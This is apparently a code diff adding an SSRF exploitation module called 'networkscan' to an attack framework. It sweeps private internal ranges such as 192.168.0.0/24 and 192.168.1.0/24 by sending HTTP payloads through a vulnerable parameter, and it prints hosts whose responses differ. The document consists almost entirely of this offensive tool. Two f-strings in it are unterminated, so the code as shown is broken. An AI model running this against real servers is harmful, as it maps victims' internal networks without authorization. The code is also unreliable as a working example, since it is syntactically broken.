1+ from utils .utils import *
2+ from datetime import datetime
3+ import sys , struct , socket
4+ import logging
5+ import concurrent .futures
6+
7+ name = "networkscan"
8+ description = "Scan the network - HTTP Ping sweep"
9+ author = "errorfiathck"
10+ documentation = []
11+
12+ class exploit ():
13+ ips = set ()
14+
15+ def __init__ (self , requester , args ):
16+ logging .info (f"Module '{ name } )
17+
18+ # concurrent requests in order to limit the time
19+ self .add_range ("192.168.1.0/24" ) # Default network
20+ self .add_range ("192.168.0.0/24" ) # Default network
21+
22+ # Uncomment these lines if you need to scan more networks
23+ # self.add_range("172.17.0.0/16") # Docker network
24+ # self.add_range("172.18.0.0/16") # Docker network
25+
26+
27+
28+ r = requester .do_request (args .param , "" )
29+ with concurrent .futures .ThreadPoolExecutor (max_workers = None ) as executor :
30+ future_to_url = {executor .submit (self .concurrent_request , requester , args .param , ip , "80" , r ): ip for ip in self .ips }
31+
32+
33+ def add_range (self , ip_cidr ):
34+ (ip , cidr ) = ip_cidr .split ('/' )
35+ cidr = int (cidr )
36+ host_bits = 32 - cidr
37+ i = struct .unpack ('>I' , socket .inet_aton (ip ))[0 ] # note the endianness
38+ start = (i >> host_bits ) << host_bits # clear the host bits
39+ end = start | ((1 << host_bits ) - 1 )
40+
41+ for i in range (start , end ):
42+ self .ips .add (socket .inet_ntoa (struct .pack ('>I' ,i )))
43+
44+
45+ def concurrent_request (self , requester , param , host , port , compare ):
46+ try :
47+ payload = wrapper_http ("" , host , port .strip ())
48+ r = requester .do_request (param , payload )
49+
50+ if (not "Connection refused" in r .text ) and (r .text != compare .text ):
51+ timer = datetime .today ().time ().replace (microsecond = 0 )
52+ print (f"\t [{ timer } { host + ' ' * 40 } )
53+
54+ timer = datetime .today ().time ().replace (microsecond = 0 )
55+ except Exception as e :
56+ pass
0 commit comments